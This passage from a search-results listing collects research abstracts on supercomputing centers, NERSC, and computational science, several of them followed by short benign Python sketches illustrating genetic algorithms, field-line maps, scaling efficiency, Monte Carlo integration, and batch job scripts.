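            child = 0.5 * (a + b)               # crossover
            child += random.gauss(0.0, 0.3)     # mutation
            children.append(child)
        pop = parents + children
    return min(pop, key=energy)

best = evolve()
```

    A real crystal-structure search replaces the scalar coordinate with lattice vectors and atomic positions, and the toy function with a DFT total-energy evaluation, but the selection/crossover/mutation loop is the same.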

  15. Effect of Magnetic Islands on Divertors in Tokamaks and Stellarators

    NASA Astrophysics Data System (ADS)

    Punjabi, Alkesh; Boozer, Allen

    2017-10-01

    Divertors are required for handling the plasma particle and heat exhausts on the walls in fusion plasmas. Relatively simple methods, models, and maps from the field line Hamiltonian are developed to better understand the interaction of strong plasma shaping and magnetic islands on the size and behavior of the magnetic flux tubes that go from the plasma edge to the wall in non-axisymmetric systems. This approach is applicable not only in tokamaks but also in stellarators. Stellarator divertors in which magnetic islands are dominant are called resonant, and those in which shaping is dominant are called non-resonant. Optimized stellarators generally have sharp edges on their surface, but unlike the case for tokamaks these edges do not encircle the entire plasma, so they do not define an edge value for the rotational transform. The approach is applied to the DIII-D tokamak. Computational results are consistent with the predictions of the models. Further simulations are being done to understand why the transition from an effective cubic to a linear increase in loss time and area of footprint occurs and whether this increase is discontinuous or not. This work is supported by the US DOE Grants DE-FG02-01ER54624 and DE-FG02-04ER54793 to Hampton University and DE-FG02-95ER54333 to Columbia University. This research used resources of the NERSC, supported by the Office of Science, US DOE, under Contract No. DE-AC02-05CH11231.
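
    The map-based approach mentioned above can be illustrated with the Chirikov standard map, a generic area-preserving map often used as a stand-in for field-line Hamiltonians; this is only a conceptual sketch, not the specific divertor map developed in this work:

```python
import math

def standard_map(theta, p, k, steps):
    """Iterate the area-preserving Chirikov standard map.

    k plays the role of the island-driving perturbation strength;
    theta and p are kept on [0, 2*pi).
    """
    traj = []
    for _ in range(steps):
        p = (p + k * math.sin(theta)) % (2.0 * math.pi)
        theta = (theta + p) % (2.0 * math.pi)
        traj.append((theta, p))
    return traj

# One field-line-like orbit; larger k produces wider island chains
# and, eventually, chaotic field-line regions.
orbit = standard_map(theta=1.0, p=0.5, k=0.9, steps=500)
```

    Iterating such a map for many starting points and recording where orbits strike a wall is, schematically, how field-line maps yield divertor footprints.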

  16. Laboratory Computing Resource Center

    Science.gov Websites

    Argonne's Laboratory Computing Resource Center (LCRC) provides computing and data resources for laboratory researchers, along with user documentation covering getting started, software, best practices and policies, and support.

  17. Exploring Electric Polarization Mechanisms in Multiferroic Oxides

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Tyson, Trevor A.

    2017-01-24

    Multiferroic oxides are a class of systems which exhibit coupling between the electrical polarization and the magnetization. These materials show promise to lead to devices in which ferroelectric memory can be written with magnetic fields or magnetic bits can be written by an electric field. The work conducted in our research focuses on single-phase materials. We studied the detailed coupling of the spin and lattice correlations in these systems. In the first phase of the proposal, we explored the complex spin-spiral systems and low-temperature behavior of hexagonal layered REMnO3 (RE = rare earth, Y, and Sc) systems, following the detailed structural changes which occurred on crossing into the magnetic states. The techniques were applied to other layered materials such as superconductors and thermoelectrics, where the same layered motif exists. The second phase of the proposal focused on understanding the mechanisms involved in the onset of high-temperature ferroelectricity in hexagonal REMnO3 and of low-temperature ferroelectricity in E-type magnetically ordered perovskite REMnO3. We synthesized perovskite small-A-site multiferroics by high-pressure and high-temperature methods. Detailed measurements of the structural properties and dynamics were conducted over a range of length scales from atomic to mesoscopic using x-ray absorption spectroscopy, x-ray diffuse scattering, x-ray and neutron pair distribution analysis, and high-resolution x-ray diffraction. Changes in vibration modes which occur with the onset of polarization were probed with temperature- and pressure-dependent infrared absorption spectroscopy. In addition, the orthorhombic system (small-radius RE ions), which is believed to exhibit electronically driven ferroelectricity and is also not well understood, was examined. The multiple-length-scale synchrotron-based measurements may assist in developing more detailed models of these materials and possibly lead to device applications.
The experimental work was complemented by density functional methods to determine the magnetic ground states and ab initio molecular dynamics (AIMD) methods to determine the high-temperature structures. Simulations were carried out on supercomputers at the National Energy Research Scientific Computing Center (NERSC). An important contribution of this work was the training of graduate students and postdoctoral researchers in materials synthesis, high-pressure methods, and synchrotron-based spectroscopy and x-ray scattering techniques.

  18. Towards high-resolution mantle convection simulations

    NASA Astrophysics Data System (ADS)

    Höink, T.; Richards, M. A.; Lenardic, A.

    2009-12-01

    The motion of tectonic plates at the Earth’s surface, earthquakes, most forms of volcanism, the growth and evolution of continents, and the volatile fluxes that govern the composition and evolution of the oceans and atmosphere are all controlled by the process of solid-state thermal convection in the Earth’s rocky mantle, with perhaps a minor contribution from convection in the iron core. Similar processes govern the evolution of other planetary objects such as Mars, Venus, Titan, and Europa, all of which might conceivably shed light on the origin and evolution of life on Earth. Modeling and understanding this complicated dynamical system is one of the true “grand challenges” of Earth and planetary science. In the past three decades much progress towards understanding the dynamics of mantle convection has been made, with the increasing aid of computational modeling. Numerical sophistication has evolved significantly, and a small number of independent codes have been successfully employed. Computational power continues to increase dramatically, and with it the ability to resolve increasingly finer fluid mechanical structures. Yet perhaps the most often cited limitation in publications based on numerical modeling is still computing power, because resolving thermal boundary layers within the convecting mantle (e.g., lithospheric plates) requires a spatial resolution of ~ 10 km. At present, the largest supercomputing facilities still barely approach the power to resolve this length scale in mantle convection simulations that include the physics necessary to model plate-like behavior. Our goal is to use supercomputing facilities to perform 3D spherical mantle convection simulations that include the ingredients for plate-like behavior, i.e. strongly temperature- and stress-dependent viscosity, at Earth-like convective vigor with a global resolution of order 10 km.
In order to qualify to use such facilities, it is also necessary to demonstrate good parallel efficiency. Here we will present two kinds of results: (1) scaling properties of the community code CitcomS on DOE/NERSC's supercomputer Franklin for up to ~ 6000 processors, and (2) preliminary simulations that illustrate the role of a low-viscosity asthenosphere in plate-like behavior in mantle convection.
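
    Parallel efficiency in a strong-scaling study like the CitcomS one described above is conventionally computed as speedup divided by the processor-count ratio. The timings below are hypothetical placeholders used to show the arithmetic, not the actual Franklin measurements:

```python
# Hypothetical strong-scaling timings in seconds per step; these are
# placeholders, NOT the actual CitcomS/Franklin measurements.
timings = {96: 100.0, 384: 26.0, 1536: 7.2, 6144: 2.1}

base_p = min(timings)            # smallest processor count = baseline
base_t = timings[base_p]

results = {}
for p in sorted(timings):
    speedup = base_t / timings[p]
    results[p] = speedup * base_p / p   # parallel efficiency vs. baseline
    print(f"{p:>5} procs: speedup {speedup:6.1f}, efficiency {results[p]:5.2f}")
```

    An efficiency near 1.0 at the largest processor count is the kind of evidence allocation committees typically expect before granting time at scale.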

  19. The Development of University Computing in Sweden 1965-1985

    NASA Astrophysics Data System (ADS)

    Dahlstrand, Ingemar

    In 1965-70 the government agency, Statskontoret, set up five university computing centers, as service bureaux financed by grants earmarked for computer use. The centers were well equipped and staffed and caused a surge in computer use. When the yearly flow of grant money stagnated at 25 million Swedish crowns, the centers had to find external income to survive and acquire time-sharing. But the charging system led to the computers not being fully used. The computer scientists lacked equipment for laboratory use. The centers were decentralized and the earmarking abolished. Eventually they got new tasks like running computers owned by the departments, and serving the university administration.

  20. Using 3D infrared imaging to calibrate and refine computational fluid dynamic modeling for large computer and data centers

    NASA Astrophysics Data System (ADS)

    Stockton, Gregory R.

    2011-05-01

    Over the last 10 years, very large government, military, and commercial computer and data center operators have spent millions of dollars trying to optimally cool data centers as each rack has begun to consume as much as 10 times more power than just a few years ago. In fact, the maximum amount of data computation in a computer center is becoming limited by the amount of available power, space and cooling capacity at some data centers. Tens of millions of dollars and megawatts of power are spent annually to keep data centers cool. The cooling and air flows dynamically diverge from the 3-D computational fluid dynamic models predicted during construction, and as time goes by the efficiency and effectiveness of the actual cooling depart even farther from the predicted models. By using 3-D infrared (IR) thermal mapping and other techniques to calibrate and refine the computational fluid dynamic modeling and to make appropriate corrections and repairs, the required power for data centers can be dramatically reduced, which lowers costs and also improves reliability.

  1. The future of climate science analysis in a coming era of exascale computing

    NASA Astrophysics Data System (ADS)

    Bates, S. C.; Strand, G.

    2013-12-01

    Projections of Community Earth System Model (CESM) output based on the growth of data archived over 2000-2012 at all of our computing sites (NCAR, NERSC, ORNL) show that we can expect to reach 1,000 PB (1 EB) sometime in the next decade or so. The current paradigm of using site-based archival systems to hold these data, which are then accessed via portals or gateways, downloaded to a local system, and processed and analyzed locally, will be irretrievably broken before then. From a climate modeling perspective, the expertise involved in making climate models themselves efficient on HPC systems will need to be applied to the data as well, providing fast parallel analysis tools co-resident in memory with the data, because disk I/O bandwidth simply will not keep up with the expected arrival of exaflop systems. The ability of scientists, analysts, stakeholders and others to use climate model output to turn these data into understanding and knowledge will require significant advances in the current typical analysis tools and packages to enable these processes for these vast volumes of data. Allowing data users to enact their own analyses on model output is virtually a requirement as well: climate modelers cannot anticipate all the possibilities for analysis that users may want to do. In addition, the expertise of data scientists, their knowledge of the model output, and their knowledge of best practices in data management (metadata, curation, provenance and so on) will need to be rewarded and exploited to gain the most understanding possible from these volumes of data. In response to growing data size, demand, and future projections, the CESM output has undergone a structural evolution and the data management plan has been reevaluated and updated. The major evolution of the CESM data structure is presented here, along with the CESM experience and role within CMIP3/CMIP5.
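
    The 1 EB projection above is essentially an exponential-growth extrapolation. A sketch of the arithmetic follows, using assumed placeholder values for the 2012 archive size and annual growth rate rather than the actual NCAR/NERSC/ORNL figures:

```python
import math

# Exponential-growth extrapolation of archive volume. The starting
# size and growth rate are assumed placeholders, not the actual
# NCAR/NERSC/ORNL figures.
start_year = 2012
start_pb = 10.0          # archived CESM output in PB (assumed)
annual_growth = 1.6      # 60% growth per year (assumed)

def years_until(target_pb):
    """Years of compound growth needed to reach target_pb."""
    return math.log(target_pb / start_pb) / math.log(annual_growth)

crossing = start_year + years_until(1000.0)   # 1,000 PB = 1 EB
```

    Under these assumed numbers the 1 EB mark is crossed roughly a decade out, consistent with the "next decade or so" projection in the abstract; different starting sizes or growth rates shift the crossing year accordingly.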

  2. Ground states of larger nuclei

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Pieper, S.C.; Wiringa, R.B.; Pandharipande, V.R.

    1995-08-01

    The methods used for the few-body nuclei require operations on the complete spin-isospin vector; the size of this vector makes such methods impractical for nuclei with A > 8. During the last few years we developed cluster expansion methods that do not require operations on the complete vector. We use the same Hamiltonians as for the few-body nuclei and variational wave functions of form similar to the few-body wave functions. The cluster expansions are made for the noncentral parts of the wave functions and for the operators whose expectation values are being evaluated. The central pair correlations in the wave functions are treated exactly and this requires the evaluation of 3A-dimensional integrals which are done with Monte Carlo techniques. Most of our effort was on {sup 16}O, other p-shell nuclei, and {sup 40}Ca. In 1993 the Mathematics and Computer Science Division acquired a 128-processor IBM SP which has a theoretical peak speed of 16 Gigaflops (GFLOPS). We converted our program to run on this machine. Because of the large memory on each node of the SP, it was easy to convert the program to parallel form with very low communication overhead. Considerably more effort was needed to restructure the program from one oriented towards long vectors for the Cray computers at NERSC to one that makes efficient use of the cache of the RS6000 architecture. The SP made possible complete five-body cluster calculations of {sup 16}O for the first time; previously we could only do four-body cluster calculations. These calculations show that the expectation value of the two-body potential is converging less rapidly than we had thought, while that of the three-body potential is more rapidly convergent; the net result is no significant change to our predicted binding energy for {sup 16}O using the new Argonne v{sub 18} potential and the Urbana IX three-nucleon potential. This result is in good agreement with experiment.
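
    The 3A-dimensional integrals mentioned above are evaluated with Monte Carlo techniques, whose statistical error falls as 1/sqrt(N) independent of dimension. A minimal sketch of the idea on a toy separable integrand with a known answer (not the nuclear wave-function integrand):

```python
import math
import random

random.seed(1)

def mc_integral(f, dim, n_samples):
    """Plain Monte Carlo estimate of the integral of f over [0,1]^dim."""
    total = 0.0
    for _ in range(n_samples):
        x = [random.random() for _ in range(dim)]
        total += f(x)
    return total / n_samples

# Toy separable integrand with a known answer:
#   integral over [0,1]^D of exp(-|x|^2) = (sqrt(pi)/2 * erf(1))^D
D = 6
estimate = mc_integral(lambda x: math.exp(-sum(xi * xi for xi in x)), D, 20000)
exact = (math.sqrt(math.pi) / 2.0 * math.erf(1.0)) ** D
```

    A grid quadrature with even 10 points per axis would need 10^(3A) evaluations for a 3A-dimensional integral, which is why Monte Carlo sampling is the only practical choice at these dimensions.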

  3. An Automated, High-Throughput System for GISAXS and GIWAXS Measurements of Thin Films

    NASA Astrophysics Data System (ADS)

    Schaible, Eric; Jimenez, Jessica; Church, Matthew; Lim, Eunhee; Stewart, Polite; Hexemer, Alexander

    Grazing incidence small-angle X-ray scattering (GISAXS) and grazing incidence wide-angle X-ray scattering (GIWAXS) are important techniques for characterizing thin films. In order to meet rapidly increasing demand, the SAXS/WAXS beamline at the Advanced Light Source (beamline 7.3.3) has implemented a fully automated, high-throughput system to conduct SAXS, GISAXS and GIWAXS measurements. An automated robot arm transfers samples from a holding tray to a measurement stage. Intelligent software aligns each sample in turn, and measures each according to user-defined specifications. Users mail in trays of samples on individually barcoded pucks, and can download and view their data remotely. Data will be pipelined to the NERSC supercomputing facility, and will be available to users via a web portal that facilitates highly parallelized analysis.

  4. Computers in aeronautics and space research at the Lewis Research Center

    NASA Technical Reports Server (NTRS)

    1991-01-01

    This brochure presents a general discussion of the role of computers in aerospace research at NASA's Lewis Research Center (LeRC). Four particular areas of computer applications are addressed: computer modeling and simulation, computer assisted engineering, data acquisition and analysis, and computer controlled testing.

  5. User-Centered Computer Aided Language Learning

    ERIC Educational Resources Information Center

    Zaphiris, Panayiotis, Ed.; Zacharia, Giorgos, Ed.

    2006-01-01

    In the field of computer aided language learning (CALL), there is a need for emphasizing the importance of the user. "User-Centered Computer Aided Language Learning" presents methodologies, strategies, and design approaches for building interfaces for a user-centered CALL environment, creating a deeper understanding of the opportunities and…

  6. CFD Modeling Activities at the NASA Stennis Space Center

    NASA Technical Reports Server (NTRS)

    Allgood, Daniel

    2007-01-01

    A viewgraph presentation on NASA Stennis Space Center's Computational Fluid Dynamics (CFD) Modeling activities is shown. The topics include: 1) Overview of NASA Stennis Space Center; 2) Role of Computational Modeling at NASA-SSC; 3) Computational Modeling Tools and Resources; and 4) CFD Modeling Applications.

  7. Opening Remarks: SciDAC 2007

    NASA Astrophysics Data System (ADS)

    Strayer, Michael

    2007-09-01

    Good morning. Welcome to Boston, the home of the Red Sox, Celtics and Bruins, baked beans, tea parties, Robert Parker, and SciDAC 2007. A year ago I stood before you to share the legacy of the first SciDAC program and identify the challenges that we must address on the road to petascale computing—a road E. E. Cummings described as `. . . never traveled, gladly beyond any experience.' Today, I want to explore the preparations for the rapidly approaching extreme scale (X-scale) generation. These preparations are the first step propelling us along the road of burgeoning scientific discovery enabled by the application of X-scale computing. We look to petascale computing and beyond to open up a world of discovery that cuts across scientific fields and leads us to a greater understanding of not only our world, but our universe. As part of the President's American Competitiveness Initiative, the ASCR Office has been preparing a ten-year vision for computing. As part of this planning, LBNL together with ORNL and ANL hosted three town hall meetings on Simulation and Modeling at the Exascale for Energy, Ecological Sustainability and Global Security (E3). The proposed E3 initiative is organized around four programmatic themes: engaging our top scientists, engineers, computer scientists and applied mathematicians; investing in pioneering large-scale science; developing scalable analysis algorithms and storage architectures to accelerate discovery; and accelerating the build-out and future development of the DOE open computing facilities. It is clear that we have only just started down the path to extreme scale computing. Plan to attend Thursday's session on the out-briefing and discussion of these meetings. The road to the petascale has been at best rocky. In FY07, the continuing resolution provided 12% less money for Advanced Scientific Computing than the President, the Senate, or the House had each proposed.
As a consequence, many of you had to absorb a no-cost extension for your SciDAC work. I am pleased that the President's FY08 budget restores the funding for SciDAC. Quoting from the Advanced Scientific Computing Research description in the House Energy and Water Development Appropriations Bill for FY08, "Perhaps no other area of research at the Department is so critical to sustaining U.S. leadership in science and technology, revolutionizing the way science is done and improving research productivity." As a society we need to revolutionize our approaches to energy, environmental and global security challenges. As we go forward along the road to the X-scale generation, computation will continue to be a critical tool, along with theory and experiment, for understanding the behavior of the fundamental components of nature as well as for fundamental discovery and exploration of the behavior of complex systems. The foundation to overcome these societal challenges will build from the experiences and knowledge gained as you, members of our SciDAC research teams, work together to attack problems at the tera- and peta-scale. If SciDAC is viewed as an experiment for revolutionizing scientific methodology, then a strategic goal of the ASCR program must be to broaden the intellectual base prepared to address the challenges of the new X-scale generation of computing. We must focus the computational science experience gained over the past five years on the opportunities introduced by extreme scale computing. Our facilities are on a path to provide the resources needed to undertake the first part of our journey. Using the newly upgraded 119 teraflop Cray XT system at the Leadership Computing Facility, SciDAC research teams have in three days performed a 100-year study of the time evolution of the atmospheric CO2 concentration originating from the land surface.
The simulation of the El Nino/Southern Oscillation that was part of this study has been characterized as `the most impressive new result in ten years'. Research teams also gained new insight into the behavior of superheated ionic gas in the ITER reactor as a result of an AORSA run on 22,500 processors that achieved over 87 trillion calculations per second (87 teraflops), 74% of the system's theoretical peak. Tomorrow, Argonne and IBM will announce that the first IBM Blue Gene/P, a 100 teraflop system, will be shipped to the Argonne Leadership Computing Facility later this fiscal year. By the end of FY2007, ASCR high performance and leadership computing resources will include the 114 teraflop IBM Blue Gene/P, a 102 teraflop Cray XT4 at NERSC, and a 119 teraflop Cray XT system at Oak Ridge. Before ringing in the New Year, Oak Ridge will upgrade to 250 teraflops by replacing its dual-core processors with quad-core processors, Argonne will upgrade to between 250 and 500 teraflops, and next year a petascale Cray Baker system is scheduled for delivery at Oak Ridge. The multidisciplinary teams in our SciDAC Centers for Enabling Technologies and our SciDAC Institutes must continue to work with our Scientific Application teams to overcome the barriers that prevent effective use of these new systems. These challenges include: the need for new algorithms, operating system and runtime software, and tools that scale to parallel systems composed of hundreds of thousands of processors; program development environments and tools that scale effectively and provide ease of use for developers and scientific end users; and visualization and data management systems that support moving, storing, analyzing, manipulating and visualizing multi-petabytes of scientific data and objects.
The SciDAC Centers, located primarily at our DOE national laboratories, will take the lead in ensuring that critical computer science and applied mathematics issues are addressed in a timely and comprehensive fashion, and will address issues associated with the research software lifecycle. In contrast, the SciDAC Institutes, which are university-led centers of excellence, will have more flexibility to pursue new research topics through a range of research collaborations. The Institutes will also work to broaden the intellectual and researcher base, conducting short courses and summer schools to take advantage of new high performance computing capabilities. The SciDAC Outreach Center at Lawrence Berkeley National Laboratory complements the outreach efforts of the SciDAC Institutes. The Outreach Center is our clearinghouse for SciDAC activities and resources and will communicate with the high performance computing community, in part to understand its needs for workshops, summer schools and institutes. SciDAC is not ASCR's only effort to broaden the computational science community needed to meet the challenges of the new X-scale generation. I hope that you were able to attend the Computational Science Graduate Fellowship poster session last night. ASCR developed the fellowship in 1991 to meet the nation's growing need for scientists and technology professionals with advanced computer skills. CSGF, now jointly funded by ASCR and NNSA, is more than a traditional academic fellowship. It has provided more than 200 of the best and brightest graduate students with guidance, support and community in preparing them as computational scientists. Today CSGF alumni are bringing their diverse top-level skills and knowledge to research teams at DOE laboratories and in industries such as Procter & Gamble, Lockheed Martin and Intel. At universities they are working to train the next generation of computational scientists.
To build on this success, we intend to develop a wholly new Early Career Principal Investigator (ECPI) program. Our objective is to stimulate academic research in scientific areas within ASCR's purview, especially among faculty in the early stages of their academic careers. Last February, we lost Ken Kennedy, one of the leading lights of our community. As we move forward into the extreme computing generation, his vision and insight will be greatly missed. In memory of Ken Kennedy, we shall designate the ECPI grants to beginning faculty in Computer Science as the Ken Kennedy Fellowship. Watch the ASCR website for more information about ECPI and other early career programs in the computational sciences. We look to you, our scientists, researchers, and visionaries to take X-scale computing and use it to explode scientific discovery in your fields. We at SciDAC will work to ensure that this tool is the sharpest, most precise, and most efficient instrument to carve away the unknown and reveal the most exciting secrets and stimulating scientific discoveries of our time. The partnership between research and computing is the marriage that will spur greater discovery, and as Spenser said to Susan in Robert Parker's novel `Sudden Mischief', `We stick together long enough, and we may get as smart as hell'. Michael Strayer

  8. Mathematics and Computer Science | Argonne National Laboratory

    Science.gov Websites

    Genomics and Systems Biology; LCRC (Laboratory Computing Resource Center); MCSG (Midwest Center for Structural Genomics); NAISE (Northwestern-Argonne Institute of Science & Engineering); SBC (Structural Biology Center)

  9. Computer Center Harris 1600 Operator’s Guide.

    DTIC Science & Technology

    1982-06-01

    Computer Center Harris 1600 Operator’s Guide, by David V. Sommer and Sharon E. Good. David W. Taylor Naval Ship Research and Development Center, June 1982; report CMLD-82-15. Approved for public release; distribution unlimited.

  10. 77 FR 34941 - Privacy Act of 1974; Notice of a Computer Matching Program

    Federal Register 2010, 2011, 2012, 2013, 2014

    2012-06-12

    ...; Notice of a Computer Matching Program AGENCY: Defense Manpower Data Center, DoD. ACTION: Notice of a... computer matching program are the Department of Veterans Affairs (VA) and the Defense Manpower Data Center... identified as DMDC 01, entitled ``Defense Manpower Data Center Data Base,'' last published in the Federal...

  11. 77 FR 35432 - Privacy Act of 1974, Computer Matching Program: United States Postal Service and the Defense...

    Federal Register 2010, 2011, 2012, 2013, 2014

    2012-06-13

    ... the Defense Manpower Data Center, Department of Defense AGENCY: Postal Service TM . ACTION: Notice of Computer Matching Program--United States Postal Service and the Defense Manpower Data Center, Department of... as the recipient agency in a computer matching program with the Defense Manpower Data Center (DMDC...

  12. Optimizing fusion PIC code performance at scale on Cori Phase 2

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Koskela, T. S.; Deslippe, J.

    In this paper we present the results of optimizing the performance of the gyrokinetic full-f fusion PIC code XGC1 on the Cori Phase Two Knights Landing system. The code has undergone substantial development to enable the use of vector instructions in its most expensive kernels within the NERSC Exascale Science Applications Program. We study the single-node performance of the code on an absolute scale using the roofline methodology to guide optimization efforts. We have obtained 2x speedups in single node performance due to enabling vectorization and performing memory layout optimizations. On multiple nodes, the code is shown to scale well up to 4000 nodes, near half the size of the machine. We discuss some communication bottlenecks that were identified and resolved during the work.
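
    The roofline methodology mentioned above can be sketched in a few lines: a kernel's attainable performance is the lesser of the machine's peak compute rate and its memory bandwidth multiplied by the kernel's arithmetic intensity. A minimal sketch follows; the machine numbers are illustrative, not actual Cori/KNL specifications.

```python
# Roofline bound used to guide optimization: attainable performance is
# min(peak compute, memory bandwidth * arithmetic intensity).
# The machine numbers below are illustrative assumptions.

def attainable_gflops(intensity, peak_gflops, bandwidth_gbs):
    """Roofline model: min(peak, bandwidth * arithmetic intensity)."""
    return min(peak_gflops, bandwidth_gbs * intensity)

# A kernel at 0.25 flop/byte on a node with 2000 GFLOP/s peak and
# 400 GB/s bandwidth is memory-bound at 100 GFLOP/s; above the ridge
# point (5 flop/byte here) it becomes compute-bound at peak.
print(attainable_gflops(0.25, 2000.0, 400.0))   # → 100.0
print(attainable_gflops(10.0, 2000.0, 400.0))   # → 2000.0
```

    Plotting measured kernel performance against this bound shows whether vectorization (raising compute throughput) or memory layout changes (raising effective bandwidth or intensity) is the profitable next step.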

  13. Data Center Consolidation: A Step towards Infrastructure Clouds

    NASA Astrophysics Data System (ADS)

    Winter, Markus

    Application service providers face enormous challenges and rising costs in managing and operating a growing number of heterogeneous system and computing landscapes. Limitations of traditional computing environments force IT decision-makers to reorganize computing resources within the data center, as continuous growth leads to an inefficient utilization of the underlying hardware infrastructure. This paper discusses a way for infrastructure providers to improve data center operations based on the findings of a case study on resource utilization of very large business applications and presents an outlook beyond server consolidation endeavors, transforming corporate data centers into compute clouds.

  14. Computer Maintenance Operations Center (CMOC), additional computer support equipment ...

    Library of Congress Historic Buildings Survey, Historic Engineering Record, Historic Landscapes Survey

    Computer Maintenance Operations Center (CMOC), additional computer support equipment - Beale Air Force Base, Perimeter Acquisition Vehicle Entry Phased-Array Warning System, Technical Equipment Building, End of Spencer Paul Road, north of Warren Shingle Road (14th Street), Marysville, Yuba County, CA

  15. Exploring the Relationships between Self-Efficacy and Preference for Teacher Authority among Computer Science Majors

    ERIC Educational Resources Information Center

    Lin, Che-Li; Liang, Jyh-Chong; Su, Yi-Ching; Tsai, Chin-Chung

    2013-01-01

    Teacher-centered instruction has been widely adopted in college computer science classrooms and has some benefits in training computer science undergraduates. Meanwhile, student-centered contexts have been advocated to promote computer science education. How computer science learners respond to or prefer the two types of teacher authority,…

  16. Computer Maintenance Operations Center (CMOC), showing duplexed cyber 170174 computers ...

    Library of Congress Historic Buildings Survey, Historic Engineering Record, Historic Landscapes Survey

    Computer Maintenance Operations Center (CMOC), showing duplexed cyber 170-174 computers - Beale Air Force Base, Perimeter Acquisition Vehicle Entry Phased-Array Warning System, Technical Equipment Building, End of Spencer Paul Road, north of Warren Shingle Road (14th Street), Marysville, Yuba County, CA

  17. NASA Center for Computational Sciences: History and Resources

    NASA Technical Reports Server (NTRS)

    2000-01-01

    The NASA Center for Computational Sciences (NCCS) has been a leading capacity computing facility, providing a production environment and support resources to address the challenges facing the Earth and space sciences research community.

  18. Center for Computing Research Summer Research Proceedings 2015.

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Bradley, Andrew Michael; Parks, Michael L.

    2015-12-18

    The Center for Computing Research (CCR) at Sandia National Laboratories organizes a summer student program each summer, in coordination with the Computer Science Research Institute (CSRI) and Cyber Engineering Research Institute (CERI).

  19. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Elbridge Gerry Puckett

    All of the work conducted under the auspices of DE-FC02-01ER25473 was characterized by exceptionally close collaboration with researchers at the Lawrence Berkeley National Laboratory (LBNL). This included having one of my graduate students, Sarah Williams, spend the summer working with Dr. Ann Almgren, a staff scientist in the Center for Computational Sciences and Engineering (CCSE), which is part of the National Energy Research Scientific Computing Center (NERSC) at LBNL. As a result of this visit Sarah decided to work on a problem suggested by Dr. John Bell, the head of CCSE, for her PhD thesis, which she finished in June 2007. Writing a PhD thesis while working at one of the University of California (UC) managed DOE laboratories is a long-established tradition at the University of California, and I have always encouraged my students to consider doing this. For example, in 2000 one of my graduate students, Matthew Williams, finished his PhD thesis while working with Dr. Douglas Kothe at the Los Alamos National Laboratory (LANL). Matt is now a staff scientist in the Diagnostic Applications Group in the Applied Physics Division at LANL. Another of my graduate students, Christopher Algieri, who was partially supported with funds from DE-FC02-01ER25473, wrote an MS thesis that analyzed and extended work published by Dr. Phil Colella and his colleagues in 1998. Dr. Colella is the head of the Applied Numerical Algorithms Group (ANAG) in the National Energy Research Scientific Computing Center at LBNL and is the lead PI for the APDEC ISIC, which comprised several national laboratory research groups and at least five university PIs at five different universities. Chris Algieri is now employed as a staff member in Dr. Bill Collins' research group at LBNL, developing computational models for climate change research. Bill Collins was recently hired at LBNL to establish and head the Climate Science Department in the Earth Sciences Division at LBNL.
Prior to this he had been a Deputy Section Head at the National Center for Atmospheric Research in Colorado. My understanding is that Chris Algieri is the first person that Bill hired after coming to LBNL. The plan is that Chris Algieri will finish his PhD thesis while employed as a staff scientist in Bill's group. Both Sarah and Chris were supported in part with funds from DE-FC02-01ER25473. In Sarah's case she received support both while at U.C. Davis (UCD) taking classes and writing an MS thesis, and during some of the time she was living in Berkeley, working at LBNL and finishing her PhD thesis. In Chris' case he was at U.C. Davis during the entire time he received support from DE-FC02-01ER25473. More specific details of their work are included in the report below. Finally, my own research conducted under the auspices of DE-FC02-01ER25473 either involved direct collaboration with researchers at LBNL (Phil Colella and Peter Schwartz, a member of Phil's Applied Numerical Algorithms Group) or was on problems that are closely related to research that has been and continues to be conducted by researchers at LBNL. Specific details of this work can be found below. I would also like to note that the work conducted by my students and me under the auspices of this contract is closely related to work that I have performed with funding from my DOE MICS contract DE-FC02-03ER25579, 'Development of High-Order Accurate Interface Tracking Algorithms and Improved Constitutive Models for Problems in Continuum Mechanics with Applications to Jetting', and with my co-PI on that grant, Professor Greg Miller of the Department of Applied Science at UCD. In theory I tried to use funds from the SciDAC grant DE-FC02-01ER25473 to support work that directly involved implementing algorithms developed by my research group at U.C. Davis in software that was developed and is maintained by my SciDAC co-PIs at LBNL.

  20. 78 FR 45513 - Privacy Act of 1974; Computer Matching Program

    Federal Register 2010, 2011, 2012, 2013, 2014

    2013-07-29

    ...; Computer Matching Program AGENCY: Defense Manpower Data Center (DMDC), DoD. ACTION: Notice of a Computer... individual's privacy, and would result in additional delay in determining eligibility and, if applicable, the... Defense. NOTICE OF A COMPUTER MATCHING PROGRAM AMONG THE DEFENSE MANPOWER DATA CENTER, THE DEPARTMENT OF...

  1. 20. SITE BUILDING 002 SCANNER BUILDING IN COMPUTER ...

    Library of Congress Historic Buildings Survey, Historic Engineering Record, Historic Landscapes Survey

    20. SITE BUILDING 002 - SCANNER BUILDING - IN COMPUTER ROOM LOOKING AT "CONSOLIDATED MAINTENANCE OPERATIONS CENTER" JOB AREA AND OPERATION WORK CENTER. TASKS INCLUDE RADAR MAINTENANCE, COMPUTER MAINTENANCE, CYBER COMPUTER MAINTENANCE AND RELATED ACTIVITIES. - Cape Cod Air Station, Technical Facility-Scanner Building & Power Plant, Massachusetts Military Reservation, Sandwich, Barnstable County, MA

  2. Vanderbilt University Institute of Imaging Science Center for Computational Imaging XNAT: A multimodal data archive and processing environment.

    PubMed

    Harrigan, Robert L; Yvernault, Benjamin C; Boyd, Brian D; Damon, Stephen M; Gibney, Kyla David; Conrad, Benjamin N; Phillips, Nicholas S; Rogers, Baxter P; Gao, Yurui; Landman, Bennett A

    2016-01-01

    The Vanderbilt University Institute of Imaging Science (VUIIS) Center for Computational Imaging (CCI) has developed a database built on XNAT housing over a quarter of a million scans. The database provides a framework for (1) rapid prototyping, (2) large-scale batch processing of images and (3) scalable project management. The system uses the web-based interfaces of XNAT and REDCap to allow for graphical interaction. A Python middleware layer, the Distributed Automation for XNAT (DAX) package, distributes computation across the Vanderbilt Advanced Computing Center for Research and Education, a high-performance computing center. All software is made available as open source for use in combining Portable Batch System (PBS) grids and XNAT servers. Copyright © 2015 Elsevier Inc. All rights reserved.
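
    The batch-distribution pattern described above, where a middleware layer fans per-scan jobs out over a PBS grid, can be sketched as follows. The job-name prefix, queue, walltime, and processing command are hypothetical illustrations, not DAX's actual interface.

```python
# Hypothetical sketch of the pattern DAX implements: emit one PBS batch
# script per scan so image processing fans out across the cluster.
# Queue name, walltime, and the processing command are assumptions.

def make_pbs_script(scan_id, command, walltime="02:00:00", queue="batch"):
    """Return the text of a PBS job script that processes one scan."""
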